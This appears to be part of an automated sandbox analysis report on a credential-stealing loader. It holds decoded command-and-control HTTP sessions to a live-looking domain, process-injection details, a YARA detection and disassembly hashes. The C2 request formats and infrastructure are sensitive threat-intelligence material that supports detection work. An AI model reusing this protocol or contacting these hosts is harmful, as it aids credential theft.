Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:07:05 UTC | 280 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1241
    Host: mafnufacut.cyou
2024-10-31 13:07:05 UTC | 1241 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
2024-10-31 13:07:05 UTC | 1014 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 13:07:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=dpq590j34kqajst8sgc77vincr; expires=Mon, 24-Feb-2025 06:53:44 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7g9VpHm5sWaNKBQ7Eks2uiJMG90P%2FwaZ4WJCpiAcn294pjl%2BoSHHLv6WgQJZoNsMa8nML6ey8tT4%2B8zCMxDwV7N%2FnhbBkwjg%2FZiHSZuBcBGgxN8zl38IlTEkYzH2MIiaBk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db3ddb6fdd22cdb-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1863&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2157&delivery_rate=1457473&cwnd=251&unsent_bytes=0&cid=25bbe67ebcf82ce1&ts=718&x=0"
2024-10-31 13:07:05 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
    Data Ascii: 11ok 173.254.250.77
2024-10-31 13:07:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.6
Source Port: 49724
Destination IP: 104.21.41.158
Destination Port: 443
PID: 2096
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:07:06 UTC | 280 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1142
    Host: mafnufacut.cyou
2024-10-31 13:07:06 UTC | 1142 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
2024-10-31 13:07:06 UTC | 1008 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 13:07:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=f7dkb6cta6vtrt76ud5q5l4imh; expires=Mon, 24-Feb-2025 06:53:45 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6uSR25JyPvkKpM2LLvEVSJt4Oj6oreQUGH6gqVxR5yVyPL4BnldGBCU6jq4HC55JUoWyA8SS4AmgcDnNxWbp3mJyUc6ntwPLXjf1KFpAW1z1r8V4%2Fs9z%2F2cn6KSTbtBdG94%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db3ddbe5a513064-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2048&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2058&delivery_rate=1262974&cwnd=251&unsent_bytes=0&cid=d9b4cfdadcd3904b&ts=459&x=0"
2024-10-31 13:07:06 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
    Data Ascii: 11ok 173.254.250.77
2024-10-31 13:07:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.6
Source Port: 49730
Destination IP: 104.21.41.158
Destination Port: 443
PID: 2096
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 13:07:07 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 121
    Host: mafnufacut.cyou
2024-10-31 13:07:07 UTC | 121 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35 31 37 61 64 64 30 37 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38
    Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--17a9517add07&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7DEA0A49D8D68686C58ADC3142F6BB48
2024-10-31 13:07:08 UTC | 1022 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 13:07:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0u9k8ebel6q9vdkiuiirc0dego; expires=Mon, 24-Feb-2025 06:53:46 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pm%2FtQmUyQmH%2Fjq7NGVnbCeLcc4YCvO49%2B8dNj8kQTEyhsCcL8UhV5fBe7oQUW64IuEGM8I8fNB%2FU7DZ8%2B7P6MXIml0gbychD%2BeA%2FR%2B%2BUYXlJOaYyTaNW743U10GjOKtNthY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8db3ddc52e453165-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1515&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1021&delivery_rate=1845761&cwnd=244&unsent_bytes=0&cid=1087649e696ec3d9&ts=488&x=0"
2024-10-31 13:07:08 UTC | 54 | IN | Data Raw: 33 30 0d 0a 36 4f 65 56 70 45 34 64 30 49 54 51 38 30 62 38 45 53 73 65 31 79 36 34 4c 35 53 59 57 64 6c 31 35 43 64 66 2f 6f 44 4d 78 42 75 7a 75 67 3d 3d 0d 0a
    Data Ascii: 306OeVpE4d0ITQ80b8ESse1y64L5SYWdl15Cdf/oDMxBuzug==
2024-10-31 13:07:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                          Target ID:0
                                                                          Start time:09:06:54
                                                                          Start date:31/10/2024
                                                                          Path:C:\Users\user\Desktop\Loader.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                          Imagebase:0x800000
                                                                          File size:304'640 bytes
                                                                          MD5 hash:CF19765D8A9A2C2FD11A7A8C4BA3DEDA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

Target ID: 1
Start time: 09:06:54
Start date: 31/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 09:06:55
Start date: 31/10/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase: 0x800000
File size: 43'016 bytes
MD5 hash: 5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true


Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 8.1%
Signature Coverage: 37.8%
Total number of Nodes: 185
Total number of Limit Nodes: 15
Memory Dump Source
• Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
• Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
Similarity
• API ID: MemoryVirtual$ThreadWrite$ContextWindow$Create$AllocateConsoleReadResumeShow$CloseHandleProcess
• String ID: 5:$5:$:pY$:pY$@$B|6$B|6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$eaE$f0iY$f0iY$kernel32.dll$ntdll.dll$vG(J$f?i
• API String ID: 3005639651-369745059
• Opcode ID: 8e9effaa500bb89b72883554182c548cd5da3f6738c681ec908406b2b9bada63
• Instruction ID: af065a26e0f41da7d6f1e491f4ebdb94a9e7a4b7bda2d28a3c806978e2b5d7b0
• Opcode Fuzzy Hash: 8e9effaa500bb89b72883554182c548cd5da3f6738c681ec908406b2b9bada63
• Instruction Fuzzy Hash: E563FF72A54211CFDF14CE7CC9A5BCA7BF1AB86310F11819AD54DDB384CA398A8ACF45
Memory Dump Source
• Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
• Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
Similarity
• API ID: CloseHandle$FileProtectVirtual$CreateInformationMappingModuleView
• String ID: .text$@
• API String ID: 3318681058-3116941980
• Opcode ID: 57c7caa802f74f916f5d9d1950d77d2623d31a5bf7d03853f791323042c0c253
• Instruction ID: e6248edcb75ae4fc796dc809d8e9958b4c03560d71d1b622bfd649cf0d5a2d94
• Opcode Fuzzy Hash: 57c7caa802f74f916f5d9d1950d77d2623d31a5bf7d03853f791323042c0c253
• Instruction Fuzzy Hash: E5C2DF75A04655CFDB14CEBCC894BDEBBF2AB86310F10819AD459EB355CB35898ACF02

Control-flow Graph
APIs
• NtQueryInformationProcess.NTDLL ref: 6E4F35CC
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,-70489D92), ref: 6E4F3715
Memory Dump Source
• Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
• Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
Similarity
• API ID: HandleInformationModuleProcessQuery
• String ID: NtQueryInformationProcess$[6u2$ntdll.dll
• API String ID: 2776635927-713812009
• Opcode ID: 9f1fdbf62fa3bf55b3615f8e83a909fc9023cf56ee9500bbfea2c2af6db2d74b
• Instruction ID: 50dbebd8baa15f42f7c7947e37203b3440658e473d57fd927761e0964a51df8f
• Opcode Fuzzy Hash: 9f1fdbf62fa3bf55b3615f8e83a909fc9023cf56ee9500bbfea2c2af6db2d74b
• Instruction Fuzzy Hash: C202BEB6E14605CFCF04CEBCC598BDEBBF1AB86714F11851AD825DB390C636990B8B42

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
Similarity
• API ID:
• String ID: @Qj5$|]#
• API String ID: 0-3690627549
• Opcode ID: a95ae061d7186ae66d67e97d3bc5374ecb298f6aa397c6f921e97e3d1d90d404
• Instruction ID: 8c8c5aff67c5a37e67c6464a0a7b9356d94809a6f82117861ed153e661fef3b1
• Opcode Fuzzy Hash: a95ae061d7186ae66d67e97d3bc5374ecb298f6aa397c6f921e97e3d1d90d404
• Instruction Fuzzy Hash: 4151E170704304CFD7989B79881476A7BB6BFCA314B24886AD486DF3A6DEB4CC068765

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
Similarity
• API ID:
• String ID: oA8
• API String ID: 0-2344185280
• Opcode ID: 1ceeb715deda5775a336cb2e2a6b9aaa90a64cc3f19624a3670cba9778508a89
• Instruction ID: 3a8e2bb77cf347ae8a60610660479132430ccdac2abf63e0ba3f1a1c6174dc4c
• Opcode Fuzzy Hash: 1ceeb715deda5775a336cb2e2a6b9aaa90a64cc3f19624a3670cba9778508a89
• Instruction Fuzzy Hash: 8CA1F534A04345CFC705CBA9C4945AABFB1FF87314F1485AAD586EB2A2CB74CD05CBA5

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
Similarity
• API ID:
• String ID: E5K[
• API String ID: 0-1075465946
• Opcode ID: 0169144e7df6fd6bf8f8667050fd0fbdb4d2c3e946e2494a2b88019e3e8cd4ac
• Instruction ID: 536f3b06c44cb3ee6be4ca3a54c17019250fd82c5f71db57af4f7cd0681e9cb9
• Opcode Fuzzy Hash: 0169144e7df6fd6bf8f8667050fd0fbdb4d2c3e946e2494a2b88019e3e8cd4ac
• Instruction Fuzzy Hash: 63613531604602CFE318CF2EDAC0975B7B5FB5A710B628952D952CF6A0C774EE91CBA1

Control-flow Graph
                                                                            control_flow_graph 1135 da4259-da4296 1137 da4299 1135->1137 1138 da429e-da42b3 1137->1138 1139 da42b9 1138->1139 1140 da4442-da4449 1138->1140 1139->1137 1139->1140 1141 da43be-da4413 1139->1141 1142 da434f-da4361 1139->1142 1143 da4330-da4334 1139->1143 1144 da42c0-da432b 1139->1144 1145 da4366-da43b9 1139->1145 1166 da4419-da4427 1141->1166 1142->1138 1146 da433d 1143->1146 1147 da4336-da433b 1143->1147 1144->1138 1145->1138 1150 da4342-da434a 1146->1150 1147->1150 1150->1138 1170 da4429-da442e 1166->1170 1171 da4430 1166->1171 1173 da4435-da443d 1170->1173 1171->1173 1173->1138
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: |]#
                                                                            • API String ID: 0-3199413927
                                                                            • Opcode ID: b8e24ebab26dcf6951226e86e8563ecfc4d353436d14c4fcfc2ca3e9dcb4a745
                                                                            • Instruction ID: e02ccde054da23ac068602dee7b7d8b22eeeed36f0d1c4478aa10fddd5ed4ce3
                                                                            • Opcode Fuzzy Hash: b8e24ebab26dcf6951226e86e8563ecfc4d353436d14c4fcfc2ca3e9dcb4a745
                                                                            • Instruction Fuzzy Hash: F441D534B043048FD7589B7D881576F7BB6AFCA300B24886AD946DB3A6DEB4DC0587A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c57367ccc0b1c46e469ac7c70403feaa12009a415833a097a51b20f4f6fc2e4
                                                                            • Instruction ID: 6246ad1eeb58737439b1f9f8dc40eef441167c72ccd5346c8a58109e90144be5
                                                                            • Opcode Fuzzy Hash: 8c57367ccc0b1c46e469ac7c70403feaa12009a415833a097a51b20f4f6fc2e4
                                                                            • Instruction Fuzzy Hash: EA61F734A04341CFC7458FA9C8902AABBB1FF87314F1485BED586DB2A1CB758D06CBA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 72d4998a3eb5b10454a5fd73f959db3f529acb4582c0dc596427b6c82fbdc452
                                                                            • Instruction ID: 72f3cab63a60c4d5d8bc84c3fda6509ff6667fe891d3664a3e0a8fe679b5b0fc
                                                                            • Opcode Fuzzy Hash: 72d4998a3eb5b10454a5fd73f959db3f529acb4582c0dc596427b6c82fbdc452
                                                                            • Instruction Fuzzy Hash: 5C512635B14215CFDB44CF78D89466EBBF6EBCA710F294466E506EB3A0CA70CD018BA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 73eb1470b6d6699052225da41bc3b976ad0098169cf117601cd46eb8195ccb09
                                                                            • Instruction ID: 74d870c6a8aebdfe05dc09d5442913ced6f3ddc63322d0f39a1b04d6636fbaaf
                                                                            • Opcode Fuzzy Hash: 73eb1470b6d6699052225da41bc3b976ad0098169cf117601cd46eb8195ccb09
                                                                            • Instruction Fuzzy Hash: 05515A31B05717CBDB049B74A98107FBBA5EB86710762492BD842DF39AC730DE059BB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d6961fa7f38a7e52021f3c482e0cba833a76076acba205445e31af8922e833e
                                                                            • Instruction ID: 1f7664d472cfd6c1ebcebf99716e75070663d46e49088640a01c1ffc1edf7195
                                                                            • Opcode Fuzzy Hash: 0d6961fa7f38a7e52021f3c482e0cba833a76076acba205445e31af8922e833e
                                                                            • Instruction Fuzzy Hash: 8F515C31B01717CB9B049B74A98103FBAA6EBC6710762453BD852DF399CB70DE019BB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 41738533bcf32633abb7304e7a66682cee55a4be5a22f12cf960095019e94a06
                                                                            • Instruction ID: 538f0dfa67b023019e5545fdfee7d51fd39b77b62e73e3874043176bbd307c70
                                                                            • Opcode Fuzzy Hash: 41738533bcf32633abb7304e7a66682cee55a4be5a22f12cf960095019e94a06
                                                                            • Instruction Fuzzy Hash: 1841B575B002158FC7048FADC88567EBAB6FB89741F20802AE516EB3A1CA71CD01CBA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5072eb7527df9bedaa1090a6cfef3ad9a8fb7be5caef9914405ddfa065fb3234
                                                                            • Instruction ID: 7cc91139c528310c1045cc8a3c9da5a6f3293be0549906de310655ee36bbadfb
                                                                            • Opcode Fuzzy Hash: 5072eb7527df9bedaa1090a6cfef3ad9a8fb7be5caef9914405ddfa065fb3234
                                                                            • Instruction Fuzzy Hash: C851C170D14259CFCB05CBA8D9914AEFFB2FF96300B18889BE442AB152C374E945CB66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a423064596fe7835abc1bbd14f412e8978285a1f299c202c3484345882266ebb
                                                                            • Instruction ID: 679c971b9d97b614c2b956f7cd873a43378d989a9a1d7c2ef77054579708b07e
                                                                            • Opcode Fuzzy Hash: a423064596fe7835abc1bbd14f412e8978285a1f299c202c3484345882266ebb
                                                                            • Instruction Fuzzy Hash: 8E419275E082548FCB04CFA9C8955BABBF6ABC9311F29806BD946E7391C630CD05CB61

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __RTC_Initialize.LIBCMT ref: 6E4F7DFF
                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6E4F7E19
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                            • String ID:
                                                                            • API String ID: 2442719207-0
                                                                            • Opcode ID: 47e82f99f56970366693334b6da0a873986250bd99e261ad39dcde1469e8a2df
                                                                            • Instruction ID: 5976e0a41ab9ccf0fd09cf8868c17128f1ec16751dd733c8d33812434dd68fcc
                                                                            • Opcode Fuzzy Hash: 47e82f99f56970366693334b6da0a873986250bd99e261ad39dcde1469e8a2df
                                                                            • Instruction Fuzzy Hash: 9B419032928655EBDB118FF5C848EAE3B79EBC5F55F11491BE4145A280D7388D038BE0

                                                                            Control-flow Graph

                                                                            Control-flow graph (rendered image omitted): function at 6E4F7E68, basic blocks 6E4F7E68-6E4F7F72; the MSVC CRT DllMain dispatch routine, calling dllmain_raw and dllmain_crt_dispatch, with internal calls to 6E4F8610, 6E4F7650 and 6E4F7DB8.
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                            • String ID:
                                                                            • API String ID: 3136044242-0
                                                                            • Opcode ID: 05f11ef93c9fd039308d4b627234ed690d73a6df0136c70e9dad1d59ae8fdef2
                                                                            • Instruction ID: d37a029516db5d3e69b50f05bb84a8702e06e540ba8993f9aed3160a3db8ffd7
